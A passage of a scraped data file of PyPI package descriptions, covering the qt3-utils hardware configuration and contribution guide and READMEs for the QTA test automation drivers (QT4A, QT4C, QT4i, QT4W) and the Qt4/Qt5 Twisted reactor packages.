read/write operationssignal_counter:ctr2# NI DAQ counter to use for counting the input signal, e.g. ctr0, ctr1, ctr2, or ctr3Default Random Data Generator configuration:QT3Scope:DAQController:import_path:qt3utils.applications.controllers.random_data_generatorclass_name:QT3ScopeRandomDataControllerconfigure:simulate_single_light_source:Falsenum_data_samples_per_batch:10default_offset:100signal_noise_amp:0.5All hardware controllers built for QT3Scope have a default\nconfiguration YAML file, which are found insrc/qt3utils/applications/controllers.QT3 Confocal ScanThe console programqt3scanperforms a 2D (x,y) scan using a data acquisition\ncontroller object and a position controller object. The default controllers use\nan NIDAQ device that counts TTL edges (typically from an SPCM) and sets\nanalog voltage values on a Jena system piezo actuator.> qt3scanSimilar toqt3scope, the supported hardware can be configured via GUI or YAML file.All hardware controllers that are built for QT3Scope have a default\nconfiguration YAML file, which will be found insrc/qt3utils/applications/controllers.Default NIDAQ Edge Counter YAML configuration:QT3Scan:DAQController:import_path:qt3utils.applications.controllers.nidaqedgecounterclass_name:QT3ScanNIDAQEdgeCounterControllerconfigure:daq_name:Dev1# NI DAQ Device Namesignal_terminal:PFI0# NI DAQ terminal connected to input digital TTL signalclock_terminal:# Specifies the digital input terminal to the NI DAQ to use for a clock. If left blank, interprets as None or NULLclock_rate:100000# NI DAQ clock rate in Hznum_data_samples_per_batch:250read_write_timeout:10# timeout in seconds for read/write operationssignal_counter:ctr2# NI DAQ counter to use for counting the input signal, e.g. ctr0, ctr1, ctr2, or ctr3PositionController:import_path:qt3utils.applications.controllers.nidaqpiezocontrollerclass_name:QT3ScanNIDAQPositionControllerconfigure:daq_name:Dev1# NI DAQ Device Namewrite_channels:ao0,ao1,ao2# NI DAQ analog output channels to use for writing positionread_channels:ai0,ai1,ai2# NI DAQ analog input channels to use for reading positionscale_microns_per_volt:8# conversion factor from volts to microns, can also supply a list [8,8,8] or [6,4.2,5]zero_microns_volt_offset:0# the voltage value that defines the position 0,0,0, can also supply a list [0,0,0] or [5,5,5]minimum_allowed_position:0# micronsmaximum_allowed_position:80# micronssettling_time_in_seconds:0.001Default Random Data Generator configuration:QT3Scan:PositionController:import_path:qt3utils.applications.controllers.random_data_generatorclass_name:QT3ScanDummyPositionControllerconfigure:maximum_allowed_position:80minimum_allowed_position:0DAQController:import_path:qt3utils.applications.controllers.random_data_generatorclass_name:QT3ScanRandomDataControllerconfigure:simulate_single_light_source:Truenum_data_samples_per_batch:10default_offset:100signal_noise_amp:0.1QT3 Piezo ControllerThe console programqt3piezocomes installed via the 'nipiezojenapy' package, and may be launched from the command line.> qt3piezoThis application can only be configured via command line options at this time.\nThenipiezojenapypython package should probably be moved intoqt3utils.QT3Scope / QT3Scan Hardware DevelopmentFollow these instructions in order to add new hardware support toqt3scopeorqt3scan.For each application, you'll need to build a Python classes that adheres to each application's interfaces.QT3ScopeBuild a class that adheres toQT3ScopeDAQControllerInterfaceas defined insrc/qt3utils/applications/qt3scope/interface.py. There are a number of methods\nthat you must construct. Two examples areQT3ScopeRandomDataControllerandQT3ScopeNIDAQEdgeCounterController.\nIn addition to controlling hardware and returning data, they must also supply a way to configure the object via\nPython dictionary (configuremethod) and graphically (configure_viewmethod).Create a YAML file with a default configuration, similar to that found inrandom_data_generator.yamlorAdd your new controller toSUPPORTED_CONTROLLERSfound inqt3scopeQT3ScanSimilar toqt3scopebut with a little more work.There are three controllers that are needed byqt3scan:Application Controller --QT3ScanApplicationControllerInterfaceDAQ Controller --QT3ScanDAQControllerInterfacePosition Controller --QT3ScanPositionControllerInterface1. Application ControllerCurrently there is onlyone implementation of the Application Controllerto support standard 2D (x,y) scans. It is used for scans using the NIDAQ Edge Counter\nController, NIDAQ Position Controller, Random Data Generator and Dummy\nPosition Controller.If you do not need any changes to the save function\nor special functionality to right-click on the scan image, then you can probably\nre-use this Application Controller.If you are developing something like the\nhyper-spectral image where each pixel in the 2D scan is based on a spectrum\nof counts over a range of wavelengths, you'll\nlikely want to build a new Application Controller. AQT3ScanHyperSpectralApplicationControllerclass would implement a\ndata view when a user right-clicks on the scan and would implement a function\nto save the full 3-dimensional data set.2. DAQ ControllerTo support new hardware that acquires data, build an implementation ofQT3ScanDAQControllerInterface.\nExamples areQT3ScanRandomDataController,\nandQT3ScanNIDAQEdgeCounterControllerCreate a new python module in insrc/qt3utils/applications/controllersfor your hardware controller.3. Position ControllerTo support a new Position Controller build an implementation ofQT3ScanPositionControllerInterface.\nExamples areQT3ScanDummyPositionController,\nandQT3ScanNIDAQPositionControllerCreate a new python module in insrc/qt3utils/applications/controllersfor your position controller.4. Default YAML fileCreate a default YAML file that configures your DAQ and Position Controllers. Place the YAML file insrc/qt3utils/applications/controllers5. Update QT3Scan.mainAdd your new controllers toqt3scan.main.pyGeneral Python DevelopmentIf you wish you make changes to qt3-utils (and hopefully merge those improvements into this repository) here are some brief instructions to get started. These instructions assume you are a\nmember of the QT3 development team and have permission to push branches to this repo. If you are not, you can\ninstead fork this repo into your own GitHub account, perform development and then issue a pull-request from\nyour forked repo to this repo through GitHub. Alternatively, reach out to a maintainer of this repo to be added as a developer.These are mostly general guidelines for software development and\ncould be followed for other projects.1. Create a development environmentUse Conda, venv or virtualenv with Python = 3.9.> conda create --name qt3utilsdev python=3.9As of this writing, we have primarily tested and used Python 3.9.\nReach out to a Maintainer to discuss moving to newer versions of\nPython if this is needed.2. Activate that environment> conda activate qt3utilsdev3. Clone this repository> git clone https://github.com/qt3uw/qt3-utils.git4. Install qt3-utils in \"editor\" mode> cd qt3-utils\n> pip install -e .Thepip install -e .command installs the package in editor mode.\nThis allows you to make changes to the source code and immediately\nsee the effects of those changes in a Python interpreter. It saves\nyou from having to call \"pip install\" each time you make a change and\nwant to test it.5. Create a new IssueIt's generally good practice to first create an Issue in this GitHub\nrepository which describes the problem that needs to be addressed.\nIt's also a good idea to be familiar with the current Issues that\nalready exist. The change you want to make may already be\nreported by another user. In that case, you could collaborate\nwith that person.6. Create a new branch for your work> git checkout -b X-add-my-fancy-new-featurewhere it's good practice to use X to refer to a specific Issue to fix\nin this repository.You should create a new branch only for a specific piece of new work\nthat will be added to this repository. It is highly discouraged to create\na separate branch for your microscope only and to use that branch\nto perform version control for Python scripts or Jupyter notebooks\nthat run experiments.\nIf you need version control for your exerpiment scripts and notebooks, you\nshould create a separate git repository and install qt3utils\nin the normal way (pip install -U qt3utils) in a Python environment\nfor your experimental work. If you need to have recent changes to qt3utils\npublished to PyPI for your work, reach out to a Maintainer of this\nrepo to ask them to release a new version.7. Add your code and test with your hardware!We do not have an official style convention, unfortunately. However\nplease try to follow best-practices as outlined either inPEP 8 styleguideorGoogle's styleguide.\nThere are other resources online, of course, that provide \"best-practices\"\nadvice. Having said that, you will certainly find places where I've\nbroken those guides. (Ideally, somebody would go through with a linter\nand fix all of these.). Please heavily document your source code.We do not have an automatic test rig. Thiscouldbe added by somebody\nif desired. But that could be complicated given that this code requires\nspecific local hardware and the setup for each experiment\nis likely to be different. So, be sure to test your code rigorously and\nmake sure there are no unintended side-effects.Historically, documentation for this project has been \"just okay\". Please\nhelp this by adding any documentation for your changes where appropriate.\nThere is now adocsfolder that you can use to include any major\nadditions or changes.8. Push your branchOnce development and testing are complete you will want to push your\nbranch to Github in order to merge it into the rest of the code-base.When you first push a branch to Github, you will need to issue this\ncommand.> git push -u origin X-add-my-fancy-new-featureAs you add more commits to your branch, you'll still want to\npush those changes every once in a while with a simple> git push(assuming that X-add-my-fancy-new-feature is your current\nlocal working branch)Finally, before you issue a pull request, you will want to\nsynchrononize your branch with any other changes made in 'main'\nto ensure there are no conflicting changes.This is the following \"flow\" that has been used successfully in\nvarious development projects. However, there are other ways\nto do this.> git checkout main\n> git pull\n> git checkout X-add-my-fancy-new-feature\n> git rebase main\n> git push -fThe series of commands above will pull down new changes from\nGithub's main branch to your local working copy. Therebasecommand will then \"replay\" your changes on top of the\nmost recent HEAD of the main branch. If there are conflicts,\ngit will notify you and you will be forced to fix those\nconflicts before continuing with the rebase. If it seems too\ncomplicated, you cangit rebase --abortto recover and\nthen figure out what to do next. Reach out to a more experienced\ncolleague, perhaps, for help.The finalgit push -fis necessary (if there were indeed new\ncommits on the main branch) and will \"force\" push your branch\nto Github. This is necessary due to the way git works.You should then test your local branch with your hardware again!This particular flow has the benefit of making a very clear git\nhistory that shows all the commits for each branch being\nmerged in logical order.Instead of following the instructions above, you may consider\ntrying GitHub's \"rebase\" option when issuing a pull request.\nIt will attempt the same set of operations. However, you may\nnot have the opportunity to test the changes locally.9. Issue a pull requestAt the top of this qt3-utils GitHub repository is a 'pull-request' tab,\nfrom where you can create a request to merge your branch to another\nbranch (usually you merge to main)When you issue a pull request, be very clear and verbose about the\nchanges you are making. New code must be reviewed by another colleague\nbefore it gets merged to master. Your pull request should include things likea statement describing what is changed or newa reference to the Issue being fixed here (Github will automatically generate a handy link)a statement describing why you chose your specific implementationresults of tests on your hardware setup, which could be data, screenshots, etc. There should be a clear record demonstrating functionality.a Jupyter notebook in the \"examples\" folder that demonstrate usage and changesdocumentation10. Perform Self ReviewBefore asking a colleague to review your changes, it's generally\na good idea to review the changes yourself in Github.\nWhen you see your updates from this perspective you may find\ntypos and changes that you wish to address first.11. Obtain a Code Review from a colleagueDue to our lack of a test rig, merging should be done with care and\ncode reviews should be taken seriously. If you are asked by a colleague\nto review their code, make sure to ask a lot of questions as you read\nthrough it. You may even want to test the branch on your own setup\nto ensure it doesn't break anything.12. Address ChangesIf you and your reviewer decide changes are needed, go back\nto your branch, make changes and push new commits. Repeat\nsteps 7, 8, 10, 11 and 12 until you are satisfied.13. Merge!If you are satisfied and confident that your changes are\nready, and your reviewer has approved the changes, press the\ngreen Merge button.NotesDebuggingLICENSELICENCE"} +{"package": "qt4a", "pacakge-description": "QT4AQT4A (Quick Test for Android) is a QTA test automation driver for Android application.FeaturesSupport most versions of Android OS from 2.3 to 8.1Multiple devices can be used simultaneously in a testSupport testing multi-process application, and multiple application can be tested simultaneouslySupport testting code obfuscated applicationSupport testing with custom controlsSupport non-root devicesQT4A should be used withQTAF, please check it first.LinksDemo ProjectUsage DocumentDesign DocumentAndroidUISpy ToolQT4A (Quick Test for Android)\uff0c\u57fa\u4e8eQTA\u63d0\u4f9b\u9762\u5411Android\u5e94\u7528\u7684UI\u6d4b\u8bd5\u81ea\u52a8\u5316\u6d4b\u8bd5\u89e3\u51b3\u65b9\u6848\u3002\u7279\u6027\u4ecb\u7ecd\u652f\u6301Android 2.3 - 8.1\u7248\u672c\u652f\u6301\u591a\u8bbe\u5907\u534f\u540c\u6d4b\u8bd5\u652f\u6301\u8de8\u8fdb\u7a0b\u3001\u8de8\u5e94\u7528\u6d4b\u8bd5\u652f\u6301\u8fdb\u884c\u8fc7\u63a7\u4ef6\u6df7\u6dc6\u7684\u5b89\u88c5\u5305\u652f\u6301\u81ea\u5b9a\u4e49\uff08\u81ea\u7ed8\uff09\u63a7\u4ef6\u652f\u6301\u975eroot\u8bbe\u5907QT4A\u9700\u8981\u548cQTAF\u4e00\u8d77\u4f7f\u7528\uff0c\u8bf7\u5148\u53c2\u8003QTAF\u7684\u4f7f\u7528\u94fe\u63a5Demo\u9879\u76ee\u4ee3\u7801\u4f7f\u7528\u6587\u6863\u8bbe\u8ba1\u6587\u6863AndroidUISpy\u5de5\u5177\u6b22\u8fce\u52a0\u5165QQ\u7fa4\uff08432699528\uff09\u4ea4\u6d41\u4f7f\u7528\u548c\u53cd\u9988"} +{"package": "qt4c", "pacakge-description": "QT4CQT4C (Quick Test for Client) is a QTA test automation driver for Win32 client application.FeaturesPowerful UI driver, support Windows native controls, Web controls, Accessibility controlsWriting maintainable functional tests with QTA QPath technology and QTA UI frameworkQT4C should be used withQTAF, please check it first.Get StartedCheck out ourUsage Documentto get going with QT4C. There is alsosample codethat shows how to run testcase with QT4C.AnatomyIf you are interested in anatomy of QT4C, theDesign Documentmay be useful to you.QT4C (Quick Test for Client)\uff0c\u57fa\u4e8eQTA\u63d0\u4f9b\u9762\u5411Win32\u5e94\u7528\u7684UI\u6d4b\u8bd5\u81ea\u52a8\u5316\u6d4b\u8bd5\u6846\u67b6\u3002\u7279\u6027\u5f3a\u5927UI\u9a71\u52a8\u5f15\u64ce\u652f\u6301\uff0cWindows Native\u63a7\u4ef6\u3001Web\u63a7\u4ef6\u3001Accessibility\u63a7\u4ef6\u57fa\u4e8eQPath\u6280\u672f\u548cQTA UI\u6846\u67b6\uff0c\u964d\u4f4e\u4ea7\u54c1\u53d8\u5316\u7684\u811a\u672c\u7ef4\u62a4\u6295\u5165QT4C\u9700\u8981\u548cQTAF\u4e00\u8d77\u4f7f\u7528\uff0c\u8bf7\u5148\u53c2\u8003QTAF\u7684\u4f7f\u7528\u5165\u95e8\u6307\u5357\u8bf7\u67e5\u770b\u6211\u4eec\u7684\u4f7f\u7528\u6587\u6863\u4ee5\u4fbf\u60a8\u5feb\u901f\u4e0a\u624bQT4C\uff0c\u540c\u65f6\u53ef\u4ee5\u53c2\u8003\u6211\u4eec\u7684\u793a\u4f8b\u4ee3\u7801\u3002\u6846\u67b6\u539f\u7406\u5982\u679c\u4f60\u5bf9QT4C\u7684\u5b9e\u73b0\u539f\u7406\u611f\u5174\u8da3\uff0c\u53ef\u4ee5\u53c2\u8003\u6211\u4eec\u7684\u8bbe\u8ba1\u6587\u6863\u3002\u6b22\u8fce\u52a0\u5165QQ\u7fa4\uff08432699528\uff09\u4ea4\u6d41\u4f7f\u7528\u548c\u53cd\u9988"} +{"package": "qt4_gengui", "pacakge-description": "A Generic Gui Built With pyqt4. Used As Starting Point For New GUI Apps.See the Code at:https://github.com/sonofeft/Qt4_GenGUISee the Docs at:http://qt4_gengui.readthedocs.org/en/latest/See PyPI page at:https://pypi.python.org/pypi/qt4_genguiThis generic GUI places a main page, menu, toolbar, statusbar and sphinx doc directory.\nModify this starting point to suit your projets\u2019 needs."} +{"package": "qt4i", "pacakge-description": "QT4iQT4i (Quick Test for iOS) is a QTA test automation driver for iOS application.FeaturesEasy to use, only Apple developer certificate is needed, no jailbreak or test stub is requiredSupport native, web and custom controls with AccessibilitySupport iOS device and simulator, and multiple devices can be used simultaneously in a testLow maintenance costs with QTA UI test automation frameworkQT4i should be used withQTAF, please check it first.Get StartedCheck out ourUsage Documentto get going with QT4i. There is alsosample codethat shows how to run testcase with QT4i.AnatomyIf you are interested in anatomy of QT4i, theDesign Documentmay be useful to you.QT4i(Quick Test for iOS)\uff0c\u57fa\u4e8eQTA\u63d0\u4f9b\u9762\u5411iOS\u5e94\u7528\u7684UI\u6d4b\u8bd5\u81ea\u52a8\u5316\u6d4b\u8bd5\u89e3\u51b3\u65b9\u6848\u3002\u4e3b\u8981\u7279\u6027\u8f7b\u677e\u6613\u7528\u2014\u2014\u65e0\u9700\u8d8a\u72f1\uff0c\u65e0\u9700\u63d2\u6869\uff0c\u53ea\u8981\u662f\u5f00\u53d1\u8005\u8bc1\u4e66\u7f16\u8bd1\u7684\u7248\u672c\u5373\u53ef\u8fdb\u884c\u6d4b\u8bd5\u5f3a\u5927\u5f15\u64ce\u2014\u2014\u652f\u6301iOS Native\u63a7\u4ef6\u3001webview\u63a7\u4ef6\u548c\u81ea\u5b9a\u4e49\u63a7\u4ef6\u5e73\u53f0\u652f\u6301\u2014\u2014\u5168\u9762\u517c\u5bb9iOS\u771f\u673a\u548c\u6a21\u62df\u5668\uff0c\u57fa\u4e8e\u5206\u5e03\u5f0f\u6280\u672f\uff0c\u9ad8\u6548\u5e76\u53d1\u6267\u884c\u6d4b\u8bd5\u9ad8\u6548\u7ef4\u62a4\u2014\u2014\u57fa\u4e8eQPath\u6280\u672f\u548cQTAFUI\u6846\u67b6\uff0c\u964d\u4f4e\u4ea7\u54c1\u53d8\u5316\u7684\u811a\u672c\u7ef4\u62a4\u6295\u5165QT4i\u9700\u8981\u548cQTAF\u4e00\u8d77\u4f7f\u7528\uff0c\u8bf7\u5148\u53c2\u8003QTAF\u7684\u4f7f\u7528\u5165\u95e8\u6307\u5357\u8bf7\u67e5\u770b\u6211\u4eec\u7684\u4f7f\u7528\u6587\u6863\u4ee5\u4fbf\u60a8\u5feb\u901f\u4e0a\u624bQT4i\uff0c\u540c\u65f6\u53ef\u4ee5\u53c2\u8003\u6211\u4eec\u7684\u793a\u4f8b\u4ee3\u7801\u3002\u6846\u67b6\u539f\u7406\u5982\u679c\u4f60\u5bf9QT4i\u7684\u5b9e\u73b0\u539f\u7406\u611f\u5174\u8da3\uff0c\u53ef\u4ee5\u53c2\u8003\u6211\u4eec\u7684\u8bbe\u8ba1\u6587\u6863\u3002\u6b22\u8fce\u52a0\u5165QQ\u7fa4\uff08432699528\uff09\u4ea4\u6d41\u4f7f\u7528\u548c\u53cd\u9988"} +{"package": "qt4ImageLabel", "pacakge-description": "UNKNOWN"} +{"package": "qt4reactor", "pacakge-description": "Qt4ReactorUsing the QtReactor-------------------Before running / importing any other Twisted code, invoke:::app = QApplication(sys.argv) # your code to init QtCorefrom twisted.application import reactorsreactors.installReactor('pyqt4')or::app = QApplication(sys.argv) # your code to init QtCorefrom twisted.application import reactorsreactors.installReactor('pyside4')alternatively (gui example):::app = PyQt4.QtGui(sys.argv) # your code to init QtGuifrom qtreactor import pyqt4reactorpyqt4reactor.install()Testing~~~~~~~::trial --reactor=pyqt4 [twisted] [twisted.test] [twisted.test.test_internet]Testing with a Gui~~~~~~~~~~~~~~~~~~Twisted trial can be run for a Gui test using gtrial. Run Trial in thesame directory as bin/gtrial and it pops up a trivial gui... hit thebuton and it all runs the same... don't use the --reactor option whencalling gtrial... but all the other options appear to work.::cp gtrial cd && trialIf you're writing a conventional Qt application and just want twisted asan addon, you can get that by calling reactor.runReturn() instead ofrun(). This call needs to occur after your installation of of thereactor and after QApplication.exec\\_() (or QCoreApplication.exec\\_()whichever you are using.reactor.run() will also work as expected in a typical twistedapplicationNote that if a QApplication or QCoreApplication instance isn'tconstructed prior to calling reactor run, an internally ownedQCoreApplication is created and destroyed. This won't work if you callrunReturn instead of run unless you take responsibility for destroyingQCoreApplication yourself...However, most users want this reactor to do gui stuff so this shouldn'tbe an issue.Performance impact of Qt has been reduced by minimizing use of signalingwhich is expensive.Examples / tests in ghtTests"} +{"package": "qt4w", "pacakge-description": "QT4WQT4W (Quick Test for Web) is a QTA test automation driver for Web.FeaturesAndroid platform: support web automated testing based on webkit, X5 (used withQT4A).IOS platform: Support Web automation testing for embedded pages of IOS applications and browser applications (used withQT4I).Windows platform: Supports web automation based on Chrome, IE kernel (used with QT4C),\nNow QT4C is in the open source process.QT4W consists of three modules: WebView, webDriver, and WebControl module.WebViewWebView is an abstraction of the browser window, which is a re-encapsulation of the native control. QT4W only defines the relevant interface of WebView, but does not give a concrete implementation. QT4X provides some implementations of WebView on each side. For example, QT4C provides implementations such as IeWebView and ChromeWebView.\nFollowing is the list of supported WebView.WebViewPlatform/OSDescriptionProviderIEWindowsIE browser or embedded IE window, supporting version from 7 to 11Provided by QT4CChromeWindowsChrome browser or embedded Webkit windowProvided by QT4CTBSWindowsQQ browser or embedded QQ browser windowProvided by QT4CCEFWindowsChromium embedded windowProvided by QT4CChromeLinuxChrome headless browserProvided by chrome-headless-browserAndroidBuildinAndroidbuild-in browser and embedded Web window on AndroidProvided byQT4AX5AndroidQQ browser or embedded QQ browser(X5) windowProvided byQT4AXWalkAndroidembedded XWalk windowProvided byAndroidWXMPLibiOSBuildiniOSbuild-in browser and embedded Web window on iOSProvided byQT4iWeChat Mini Program&WeChat H5WeChat AndroidWeChat Mini Program OR WeChat H5Provided byAndroidWXMPLibChromeMacOSChrome browser or embedded Webkit windowProvided by QT4MacWebDriverWebDriver is the driver layer of web automation. This module is mainly used to handle Dom structure related operations, such as finding web elements. Implementation of WebDriver mostly involved with Browser engine.Following is the list of supported WebDriver.WebDriver\u8bf4\u660e\u76f8\u5173\u5b9e\u73b0\u4ee3\u7801IEIE Trident engineProvided byQT4WWebkitWebkit engineProvided byQT4WWebControlThe WebControl module defines the WebElement and WebPage interfaces and provides implementations. In addition, QT4W also encapsulates other common web elements that are used to encapsulate pages for web automation.Webelement and WebPage usage refer to usage documentation\u3002Usage scenarios and installationQT4W can be used for web applications or embedded page automation, which cannot be used independently and needs to be used in conjunction with other native layer automation frameworks:Android: use and installation, please refer toQT4A Document.iOS: use and install, please refer toQT4i document.Windows: use and install, please refer to QT4C documentlinksUsage DocumentDesign DocumentQT4W(Quick Test for Web)\u662fQTA\u6d4b\u8bd5\u4f53\u7cfb\u4e2d\u7684\u4e00\u73af\uff0c\u4e3b\u8981\u7528\u4e8eWeb\u81ea\u52a8\u5316\u6d4b\u8bd5\u3002\u652f\u6301\u591a\u79cd\u5e73\u53f0\u7684Web\u81ea\u52a8\u5316Android\u5e73\u53f0\uff1a\u652f\u6301\u57fa\u4e8ewebkit\uff0cX5\u7b49\u5185\u6838Web\u81ea\u52a8\u5316\u6d4b\u8bd5\uff08\u548cQT4A\u4e00\u8d77\u4f7f\u7528)\u3002IOS\u5e73\u53f0\uff1a\u652f\u6301IOS\u5e94\u7528\u7684\u5185\u5d4c\u9875\u9762\u53ca\u6d4f\u89c8\u5668\u5e94\u7528\u7684Web\u81ea\u52a8\u5316\u6d4b\u8bd5\uff08\u548cQT4I\u4e00\u8d77\u4f7f\u7528\u3002Windows\u5e73\u53f0\uff1a\u652f\u6301\u57fa\u4e8eChrome\uff0cIE\u5185\u6838\u7684Web\u81ea\u52a8\u5316\u6d4b\u8bd5\uff08\u548cQT4C\u4e00\u8d77\u4f7f\u7528\uff09\uff0c\u76ee\u524dQT4C\u6b63\u5728\u5f00\u6e90\u6d41\u7a0b\u4e2d\u3002QT4W\u662fQTA\u6d4b\u8bd5\u4f53\u7cfb\u4e2dWeb\u81ea\u52a8\u5316\u6d4b\u8bd5\u7684\u57fa\u7840\uff0c \u5305\u542b\u4e09\u4e2a\u6a21\u5757\uff1aWebView\u3001webDriver\u4ee5\u53caWebControl\u6a21\u5757\u3002WebViewWebView\u662f\u5bf9\u6d4f\u89c8\u5668\u7a97\u53e3\u7684\u62bd\u8c61\uff0c\u662f\u5bf9\u539f\u751f\u63a7\u4ef6\u7684\u518d\u6b21\u5c01\u88c5\u3002QT4W\u53ea\u662f\u5b9a\u4e49\u4e86WebView\u7684\u76f8\u5173\u63a5\u53e3\uff0c\u5e76\u672a\u7ed9\u51fa\u5177\u4f53\u5b9e\u73b0\u3002QT4X\u5404\u7aef\u63d0\u4f9b\u4e86\u90e8\u5206WebView\u7684\u5b9e\u73b0\uff0c\u4f8b\u5982QT4C\u4e2d\u63d0\u4f9bIeWebView\u3001ChromeWebView\u7b49\u5b9e\u73b0\u3002\n\u76ee\u524dQT4W\u652f\u6301\u7684WebView\u6709\uff1aWebView\u5e73\u53f0\u6216\u64cd\u4f5c\u7cfb\u7edf\u8bf4\u660e\u76f8\u5173\u5b9e\u73b0\u4ee3\u7801IEWindowsIE\u6d4f\u89c8\u5668\u548c\u5185\u5d4c\u9875\u9762\u4f7f\u7528\uff0c\u652f\u6301IE 7\uff5e11\u7531QT4C\u63d0\u4f9bChromeWindowsChrome\u6d4f\u89c8\u5668\u548c\u5185\u5d4c\u9875\u9762\u4f7f\u7528\u7531QT4C\u63d0\u4f9bTBSWindowsQQ\u6d4f\u89c8\u5668\u548c\u76f8\u5173\u5185\u5d4c\u9875\u9762\u4f7f\u7528\u7531QT4C\u63d0\u4f9bCEFWindowsChromium\u5185\u5d4c\u9875\u9762\u4f7f\u7528\u7531QT4C\u63d0\u4f9bChromeLinuxLinux\u4e0b\u7684Headless\u6a21\u5f0f\u7684Chrome\u6d4f\u89c8\u5668\u4f7f\u7528\u7531chrome-headless-browser\u63d0\u4f9bAndroidBuildinAndroidAndroid\u7cfb\u7edf\u5185\u7f6e\u6d4f\u89c8\u5668\u548c\u5185\u5d4c\u9875\u9762\u4f7f\u7528\u7531QT4A\u63d0\u4f9bX5AndroidQQ\u79fb\u52a8\u6d4f\u89c8\u5668\u548cX5\u5185\u6838\u5185\u5d4c\u9875\u9762\u4f7f\u7528\u7531QT4A\u63d0\u4f9bXWalkAndroidXWalk\u5185\u6838\u5185\u5d4c\u9875\u9762\u4f7f\u7528\u7531AndroidWXMPLib\u63d0\u4f9biOSBuildiniOSiOS\u7cfb\u7edf\u5185\u7f6e\u6d4f\u89c8\u5668\u548c\u5185\u5d4c\u9875\u9762\u4f7f\u7528\u7531QT4i\u63d0\u4f9b\u5fae\u4fe1\u5c0f\u7a0b\u5e8f&\u5fae\u4fe1H5Android\u5fae\u4fe1\u5fae\u4fe1\u5c0f\u7a0b\u5e8f\u6216\u8005\u5fae\u4fe1H5\u4f7f\u7528\u7531AndroidWXMPLib\u63d0\u4f9bChromeMacOSMac OS\u4e0b\u7684Chrome\u6d4f\u89c8\u5668\u548c\u5185\u5d4c\u9875\u9762\u4f7f\u7528\u7531QT4Mac\u63d0\u4f9b\u5982\u9700\u8981\u6269\u5c55\u65b0\u7684WebView\u7c7b\u578b\uff0c\u8bf7\u53c2\u8003WebView\u5c01\u88c5\u6587\u6863\u3002WebDriverWebDriver\u662fWeb\u81ea\u52a8\u5316\u4e2d\u9a71\u52a8\u5c42\u7684\u5c01\u88c5\uff0c\u8be5\u6a21\u5757\u4e3b\u8981\u7528\u6765\u5904\u7406DOM\u7ed3\u6784\u76f8\u5173\u64cd\u4f5c\uff0c\u4f8b\u5982\u67e5\u627eweb\u5143\u7d20\u7b49\uff0c\u4e00\u822c\u662f\u6d4f\u89c8\u5668\u5185\u6838\u76f8\u5173\u3002\u76ee\u524dQT4W\u652f\u6301\u7684WebDriver\u6709\uff1aWebDriver\u8bf4\u660e\u76f8\u5173\u5b9e\u73b0\u4ee3\u7801IEIE\u5185\u6838\u4f7f\u7528\u7531QT4W\u5185\u7f6eWebkitWebkit\u5185\u6838\u4f7f\u7528\u7531QT4W\u5185\u7f6e\u5982\u9700\u8981\u6269\u5c55\u65b0\u7684WebDriver\u8bf7\u53c2\u8003WebDriver\u5c01\u88c5\u6587\u6863\u3002WebControlWebControl\u6a21\u5757\u5b9a\u4e49WebElement\u4ee5\u53caWebPage\u7684\u63a5\u53e3\uff0c\u5e76\u4e14\u7ed9\u51fa\u4e86\u76f8\u5173\u5b9e\u73b0\u3002\u6b64\u5916\uff0cQT4W\u8fd8\u5c01\u88c5\u4e86\u5176\u4ed6\u7684\u5e38\u7528Web\u5143\u7d20\uff0c\u4f7f\u7528\u8be5\u6a21\u5757\u6765\u5c01\u88c5Web\u81ea\u52a8\u5316\u65f6\u7684\u9875\u9762\u3002\u4f7f\u7528\u573a\u666f\u53ca\u5b89\u88c5QT4W\u53ef\u7528\u4e8e\u5404\u4e2a\u7aef\u4e0a\u7684Web\u5e94\u7528\u6216\u8005Native\u5e94\u7528\u5185\u5d4cWeb\u9875\u9762\u7684\u81ea\u52a8\u5316\uff0c\u5176\u4e0d\u80fd\u72ec\u7acb\u4f7f\u7528\u4ee5\u53ca\u9700\u8981\u7ed3\u5408\u5176\u4ed6Native\u5c42\u7684\u81ea\u52a8\u5316\u6846\u67b6\u4e00\u8d77\u4f7f\u7528\uff1aAndroid\u7aef\u7684\u4f7f\u7528\u53ca\u5b89\u88c5\uff0c\u8bf7\u53c2\u8003QT4A\u6587\u6863iOS\u7aef\u7684\u4f7f\u7528\u53ca\u5b89\u88c5\uff0c\u8bf7\u53c2\u8003QT4i\u6587\u6863Windows\u7aef\u7684\u4f7f\u7528\u53ca\u5b89\u88c5\uff0c\u8bf7\u53c2\u8003QT4C\u6587\u6863\u94fe\u63a5\u4f7f\u7528\u6587\u6863\u8bbe\u8ba1\u6587\u6863\u6b22\u8fce\u52a0\u5165QQ\u7fa4\uff08432699528\uff09\u4ea4\u6d41\u4f7f\u7528\u548c\u53cd\u9988"} +{"package": "qt5", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qt5-applications", "pacakge-description": "Perhaps docs will follow but for now seethe pyqt-tools readmeandthe qt-tools readme. This package provides just the collection of Qt\napplications to avoid repeating the same large files in several packages for\ndifferent Python versions. These files are not intended to be used directly."} +{"package": "qt5-cef", "pacakge-description": "version: 1.1.7\n\nsth tips(mac):\n1, cefpython3== version 57.0, python version to use the version 3.7, 3.7 version is not supported.\ncefpython3==66.0. If the mac os version is less than 11(big sur), you need to enable the external_message_pump parameter. Otherwise, the page cannot respond to the event loop properly.\n3, cefpython3==66.0 version, if the native html select tag element appears in the page, after clicking will produce a flash back phenomenon.\n4. For mac os packaging, use the pyinstaller package tool (pyinstaller version is 4.3).Version: 1.1.8 / 1.1.9 / 1.1.10\n\nsth tips:\n1. When the embedded page is cross-domain, the request request is blocked through CEF\n2. WebRequestClient OnDownloadData() accepted byte as the data type, but actually received string as the data type. Write to byte before buffering; otherwise, the output parameter is not fully displayed"} +{"package": "qt5-levelmeter", "pacakge-description": "Level Meter (VU Meter) for QT5Installation:From source:git clone https://gitlab.com/t-5/python3-qt5-levelmeter.git\ncd python3-qt5-levelmeter\npip3 install .Debian Package:I have a prebuilt debian package for this module.\nPlease refer to the pagehttps://t-5.eu/hp/Software/Debian%20repository/to setup the repo.\nAfter the repo is setup you can install the package by issueingapt install python3-qt5-levelmeterin a shell.Usage:Usage:\nfrom qt5_levelmeter import QLevelMetermeter = QLevelMeter(parent)call periodically:\nmeter.levelChanged(levelInDb)"} +{"package": "qt5reactor", "pacakge-description": "Using the Qt5ReactorQt5Reactor is compatible with both PyQt5 and PySide2.Install using pippip install qt5reactorBefore running / importing any other Twisted code, invoke:app = QApplication(sys.argv) # your code to init QtCore\nfrom twisted.application import reactors\nreactors.installReactor('qt5')orapp = QApplication(sys.argv) # your code to init QtCore\nimport qt5reactor\nqt5reactor.install()Testingtrial --reactor=qt5 [twisted] [twisted.test] 